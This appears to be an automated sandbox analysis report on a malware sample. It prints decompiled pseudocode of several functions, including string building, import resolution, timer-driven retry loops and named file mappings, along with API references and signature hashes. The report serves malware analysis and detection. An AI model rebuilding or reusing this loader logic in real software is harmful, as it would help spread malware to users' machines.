				_t75 = E001D18D5(0x1dd00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x1dd238, _t153, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x1dd238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x1dd238, _t153, _v20);
						goto L26;
					}
					E001D6852(GetTickCount());
					_t82 =  *0x1dd32c; // 0x2fa95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x1dd32c; // 0x2fa95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x1dd32c; // 0x2fa95b0
					_t149 = E001D8840(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x1dd238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x1dc2ac);
					_push(_t149);
					_t94 = E001D8007();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x1dd238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E001D1546(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E001D45F1();
						L22:
						HeapFree( *0x1dd238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E001D2284(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_v12 = E001D5349(_t158, _a4, _a8, _a12);
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E001DA5FA(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E001D88F0(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E001DA5FA(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x001d24b4
0x001d24b4
0x001d24b4
0x001d24bd
0x001d24c6
0x001d24c8
0x001d24c8
0x001d24d5
0x001d24e0
0x001d24e3
0x001d24e8
0x001d24f1
0x001d24f4
0x001d24f9
0x001d24fc
0x001d2501
0x001d2504
0x001d2510
0x001d251d
0x001d251f
0x001d2525
0x001d252a
0x001d2535
0x001d2537
0x001d253a
0x001d253c
0x001d2541
0x001d2547
0x001d254c
0x001d254f
0x001d2554
0x001d2561
0x001d2563
0x001d2569
0x001d2573
0x001d2573
0x001d2575
0x001d257a
0x001d257f
0x001d2582
0x001d2587
0x001d2594
0x001d2596
0x001d25a4
0x001d25a4
0x001d25a6
0x001d25b4
0x001d25b9
0x001d25bb
0x001d25c0
0x001d2783
0x001d278d
0x001d2796
0x001d25c6
0x001d25d2
0x001d25d8
0x001d25dd
0x001d2777
0x001d2781
0x00000000
0x001d2781
0x001d25e9
0x001d25ee
0x001d25f7
0x001d2608
0x001d260c
0x001d2615
0x001d261b
0x001d262a
0x001d2631
0x001d263a
0x001d2640
0x001d276b
0x001d2775
0x00000000
0x001d2775
0x001d264c
0x001d2652
0x001d2653
0x001d2658
0x001d265d
0x001d2761
0x001d2769
0x00000000
0x001d2769
0x001d2666
0x001d266d
0x001d2675
0x001d267a
0x001d2683
0x001d2689
0x001d2690
0x001d2695
0x001d269a
0x001d2799
0x001d274d
0x001d274d
0x001d2752
0x001d275d
0x001d275f
0x00000000
0x001d275f
0x001d26a4
0x001d26a9
0x001d26ae
0x001d26b3
0x001d26c3
0x001d26c6
0x001d26cc
0x001d26d2
0x001d26d8
0x001d26db
0x001d26e1
0x001d26e4
0x001d26e9
0x001d26ed
0x001d26ed
0x001d26f9
0x001d2705
0x001d2709
0x001d270b
0x001d2710
0x001d2712
0x001d2717
0x001d271c
0x001d2729
0x001d2731
0x001d2734
0x001d2734
0x001d2710
0x00000000
0x001d26fb
0x001d26ff
0x001d2736
0x001d2739
0x001d2742
0x00000000
0x00000000
0x00000000
0x00000000
0x001d2742
0x001d2701
0x00000000
0x001d2701
0x001d26f9

APIs

GetTickCount.KERNEL32 ref: 001D24C8
wsprintfA.USER32 ref: 001D2518
wsprintfA.USER32 ref: 001D2535
wsprintfA.USER32 ref: 001D2561
HeapFree.KERNEL32(00000000,?), ref: 001D2573
wsprintfA.USER32 ref: 001D2594
HeapFree.KERNEL32(00000000,?), ref: 001D25A4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001D25D2
GetTickCount.KERNEL32 ref: 001D25E3
RtlEnterCriticalSection.NTDLL(02FA9570), ref: 001D25F7
RtlLeaveCriticalSection.NTDLL(02FA9570), ref: 001D2615

Part of subcall function 001D8840: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,001D2AF0,?,02FA95B0), ref: 001D886B
Part of subcall function 001D8840: lstrlen.KERNEL32(?,?,?,001D2AF0,?,02FA95B0), ref: 001D8873
Part of subcall function 001D8840: strcpy.NTDLL ref: 001D888A
Part of subcall function 001D8840: lstrcat.KERNEL32(00000000,?), ref: 001D8895
Part of subcall function 001D8840: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,001D2AF0,?,02FA95B0), ref: 001D88B2

StrTrimA.SHLWAPI(00000000,001DC2AC,?,02FA95B0), ref: 001D264C

Part of subcall function 001D8007: lstrlen.KERNEL32(02FA9918,00000000,00000000,7742C740,001D2B1B,00000000), ref: 001D8017
Part of subcall function 001D8007: lstrlen.KERNEL32(?), ref: 001D801F
Part of subcall function 001D8007: lstrcpy.KERNEL32(00000000,02FA9918), ref: 001D8033
Part of subcall function 001D8007: lstrcat.KERNEL32(00000000,?), ref: 001D803E

lstrcpy.KERNEL32(00000000,?), ref: 001D266D
lstrcpy.KERNEL32(?,?), ref: 001D2675
lstrcat.KERNEL32(?,?), ref: 001D2683
lstrcat.KERNEL32(?,00000000), ref: 001D2689

Part of subcall function 001D1546: lstrlen.KERNEL32(?,00000000,001DD330,00000001,001D67F7,001DD00C,001DD00C,00000000,00000005,00000000,00000000,?,?,?,001D41AA,001D5D90), ref: 001D154F
Part of subcall function 001D1546: mbstowcs.NTDLL ref: 001D1576
Part of subcall function 001D1546: memset.NTDLL ref: 001D1588

wcstombs.NTDLL ref: 001D271C

Part of subcall function 001D5349: SysAllocString.OLEAUT32(?), ref: 001D5384

Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606

HeapFree.KERNEL32(00000000,?,?), ref: 001D275D
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D2769
HeapFree.KERNEL32(00000000,?,?,02FA95B0), ref: 001D2775
HeapFree.KERNEL32(00000000,?), ref: 001D2781
HeapFree.KERNEL32(00000000,?), ref: 001D278D

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3748877296-0
Opcode ID: 33dba041d353120b68728f5c363192e2b72c02038d68d66ee9ba88ea5eacd344
Instruction ID: f5669af91af33fa2db3e31326d1ef33c1319d3ec32a057bcb63bd8165702ed2d
Opcode Fuzzy Hash: 33dba041d353120b68728f5c363192e2b72c02038d68d66ee9ba88ea5eacd344
Instruction Fuzzy Hash: F9914971902219EFCB11EFA8EC89AAE7BB9FF58310F144456F408D7260DB31D991DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001DAD95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E001DAD95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x1d0000;
				_t115 = _t139[3] + 0x1d0000;
				_t131 = _t139[4] + 0x1d0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x1d0000;
				_v16 = _t139[5] + 0x1d0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x1d0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x1dd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x1dd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x1dd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x1dd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x1dd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x1dd198; // 0x0
										 *_t102 = _t125;
										 *0x1dd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x1dd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x001dada4
0x001dadba
0x001dadc0
0x001dadc2
0x001dadc7
0x001dadcd
0x001dadd2
0x001dadd5
0x001dade3
0x001dadea
0x001daded
0x001dadf0
0x001dadf1
0x001dadf4
0x001dadf7
0x001dadfa
0x001dadff
0x001dae0e
0x00000000
0x001dae14
0x001dae1e
0x001dae28
0x001dae2d
0x001dae2f
0x001dae39
0x001dae3c
0x001dae3f
0x001dae45
0x001dae47
0x001dae47
0x001dae4a
0x001dae4d
0x001dae52
0x001dae56
0x001dae69
0x001dae6b
0x001daf13
0x001daf13
0x001daf1a
0x001daf1d
0x001daf27
0x001daf27
0x001daf2b
0x001dafa9
0x001dafac
0x001dafae
0x001dafae
0x001dafb5
0x001dafb7
0x001dafc1
0x001dafc4
0x001dafc7
0x001dafc7
0x00000000
0x001daf2d
0x001daf30
0x001daf5e
0x001daf68
0x001daf6c
0x001daf74
0x001daf77
0x001daf7e
0x001daf88
0x001daf88
0x001daf8c
0x001daf91
0x001dafa0
0x001dafa6
0x001dafa6
0x001daf8c
0x00000000
0x001daf37
0x001daf3a
0x001daf42
0x001daf57
0x001daf5c
0x00000000
0x00000000
0x001daf5c
0x00000000
0x001daf42
0x001daf30
0x001daf2b
0x001dae71
0x001dae78
0x001dae88
0x001dae8b
0x001dae91
0x001dae95
0x001daed8
0x001daee4
0x001daf0d
0x001daee6
0x001daeea
0x001daef0
0x001daef8
0x001daefa
0x001daefd
0x001daf03
0x001daf05
0x001daf05
0x001daef8
0x001daeea
0x00000000
0x001daee4
0x001dae9d
0x001daea0
0x001daea7
0x001daeb7
0x001daeba
0x001daeca
0x00000000
0x001daed0
0x001daeb1
0x001daeb5
0x00000000
0x00000000
0x00000000
0x001daeb5
0x001dae82
0x001dae86
0x00000000
0x00000000
0x00000000
0x001dae86
0x001dae5f
0x001dae63
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DAE0E
LoadLibraryA.KERNELBASE(?), ref: 001DAE8B
GetLastError.KERNEL32 ref: 001DAE97
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 001DAECA

Strings

$, xrefs: 001DADE3

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: e0516122e1802004884b0ed34049cbb4b430eebc93eef66cb38171f5aaed113e
Instruction ID: 71e73a94895b2a45ae9bc5dffe0e5c08cbb54b463ae632a965f875cc2528b588
Opcode Fuzzy Hash: e0516122e1802004884b0ed34049cbb4b430eebc93eef66cb38171f5aaed113e
Instruction Fuzzy Hash: 178138B5A01205AFDB20CFA8D880BAEB7F5EF58300F54852AE909E7750EB70E945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001D8494, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E001D8494(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x1dd240);
					_v20 = 0;
					_v16 = 0;
					L001DB078();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x1dd26c; // 0x23c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x1dd24c = 5;
						} else {
							_t68 = E001D579B(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x1dd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E001D8A1D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E001D8634(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x1dd244);
							goto L21;
						} else {
							__eflags =  *0x1dd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E001D45F1();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x1dd248);
								L21:
								L001DB078();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x1dd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x001d8494
0x001d84a6
0x001d84a9
0x001d84b5
0x001d84bb
0x001d84c0
0x001d8627
0x001d84c6
0x001d84c6
0x001d84c8
0x001d84cd
0x001d84ce
0x001d84d4
0x001d84d7
0x001d84da
0x001d84e8
0x001d84f3
0x001d84f6
0x001d84f8
0x001d8505
0x001d850f
0x001d8511
0x001d8516
0x001d851b
0x001d8526
0x001d8526
0x001d851d
0x001d851d
0x001d8524
0x00000000
0x00000000
0x001d8524
0x001d8530
0x00000000
0x001d8533
0x001d8537
0x001d8542
0x001d8542
0x001d8549
0x001d8552
0x001d8559
0x001d8562
0x001d8565
0x001d8568
0x001d856d
0x001d8572
0x00000000
0x00000000
0x001d8574
0x001d8577
0x001d857a
0x001d857d
0x00000000
0x001d857f
0x001d858e
0x001d858e
0x00000000
0x001d85bc
0x001d85bc
0x001d85c1
0x001d85e0
0x001d85e2
0x001d85e7
0x001d85e8
0x00000000
0x001d85c3
0x001d85c3
0x001d85c9
0x00000000
0x001d85cb
0x001d85cb
0x001d85d0
0x001d85d2
0x001d85d7
0x001d85d8
0x001d85ee
0x001d85ee
0x001d85f6
0x001d8601
0x001d8604
0x001d860f
0x001d8611
0x001d8614
0x001d8616
0x00000000
0x001d861c
0x00000000
0x001d861c
0x001d8616
0x001d85c9
0x00000000
0x001d85c1
0x001d8591
0x001d8593
0x001d8596
0x001d8597
0x001d8597
0x001d859b
0x001d85a5
0x001d85a5
0x001d85ab
0x001d85ae
0x001d85ae
0x001d85b4
0x001d85b4
0x001d8631
0x00000000

APIs

memset.NTDLL ref: 001D84A9
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001D84B5
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 001D84DA
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 001D84F6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D850F
HeapFree.KERNEL32(00000000,00000000), ref: 001D85A5
CloseHandle.KERNEL32(?), ref: 001D85B4
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 001D85EE
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,001D5DBE,?), ref: 001D8604
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D860F

Part of subcall function 001D579B: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02FA9388,00000000,?,74B5F710,00000000,74B5F730), ref: 001D57EA
Part of subcall function 001D579B: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02FA93C0,?,00000000,30314549,00000014,004F0053,02FA937C), ref: 001D5887
Part of subcall function 001D579B: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001D8522), ref: 001D5899

GetLastError.KERNEL32 ref: 001D8621

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: cd5969137e6e27153ecf8b3d25e8ef8e3b0f121f3fcdb86258c256294161d41d
Instruction ID: 7bbda363eca4ee22d6a7893fd2a787cfd1cdefe049be64bfc0b7361de1ec33fc
Opcode Fuzzy Hash: cd5969137e6e27153ecf8b3d25e8ef8e3b0f121f3fcdb86258c256294161d41d
Instruction Fuzzy Hash: 52512E71802229EBDF11DF95EC449EEBFB8EF59760F204617F515A2290DB709A84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E241352, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E241352(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E242130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e244144;
				_push(_t15 + 0x6e24505e);
				_push(_t15 + 0x6e245054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E24212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e244148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e241352
0x6e24135b
0x6e24135f
0x6e241365
0x6e24136a
0x6e24136f
0x6e241372
0x6e241375
0x6e24137a
0x6e24137b
0x6e24137e
0x6e241389
0x6e241390
0x6e241394
0x6e241396
0x6e241397
0x6e24139a
0x6e24139f
0x6e2413a9
0x6e2413ab
0x6e2413ab
0x6e2413bf
0x6e2413c5
0x6e2413c9
0x6e241419
0x6e2413cb
0x6e2413d4
0x6e2413ea
0x6e2413f2
0x6e241404
0x6e241408
0x00000000
0x00000000
0x6e2413f4
0x6e2413f7
0x6e2413fc
0x6e2413fe
0x6e2413fe
0x6e2413df
0x6e2413e1
0x6e24140a
0x6e24140b
0x6e24140b
0x6e2413d4
0x6e241421

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E24135F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E241375
_snwprintf.NTDLL ref: 6E24139A
CreateFileMappingW.KERNELBASE(000000FF,6E244148,00000004,00000000,?,?), ref: 6E2413BF
GetLastError.KERNEL32 ref: 6E2413D6
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E2413EA
GetLastError.KERNEL32 ref: 6E241402
CloseHandle.KERNEL32(00000000), ref: 6E24140B
GetLastError.KERNEL32 ref: 6E241413

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 8c87bfb6f97a0e045ba2ca14dd10ce6b4872ebe35748ab517615d60386e1b4e5
Instruction ID: d9a3db51d8064319140bfa6bcbb0a9a1b218fa127b80f28bc804f1369a0bf4a9
Opcode Fuzzy Hash: 8c87bfb6f97a0e045ba2ca14dd10ce6b4872ebe35748ab517615d60386e1b4e5
Instruction Fuzzy Hash: 382190B250010DFFDB16EFE8CC88E9E77BAEB49355F114125F615E7180DA7099898B70

Uniqueness

Uniqueness Score: -1.00%

Function 001D81E7, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E001D81E7(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L001DB072();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x1dd2a4; // 0x2dca5a8
				_t5 = _t13 + 0x1de862; // 0x2fa8e0a
				_t6 = _t13 + 0x1de59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L001DAD0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x1dd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x001d81e7
0x001d81ef
0x001d81f3
0x001d81f9
0x001d81fe
0x001d8203
0x001d8206
0x001d8209
0x001d820e
0x001d820f
0x001d8212
0x001d8217
0x001d821e
0x001d8228
0x001d822a
0x001d822b
0x001d822e
0x001d824a
0x001d8250
0x001d8254
0x001d82a2
0x001d8256
0x001d8263
0x001d8273
0x001d827b
0x001d828d
0x001d8291
0x00000000
0x00000000
0x001d827d
0x001d8280
0x001d8285
0x001d8287
0x001d8287
0x001d8265
0x001d8267
0x001d8293
0x001d8294
0x001d8294
0x001d8263
0x001d82a9

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,001D5C91,?,?,4D283A53,?,?), ref: 001D81F3
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001D8209
_snwprintf.NTDLL ref: 001D822E
CreateFileMappingW.KERNELBASE(000000FF,001DD2A8,00000004,00000000,00001000,?), ref: 001D824A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D5C91,?,?,4D283A53), ref: 001D825C
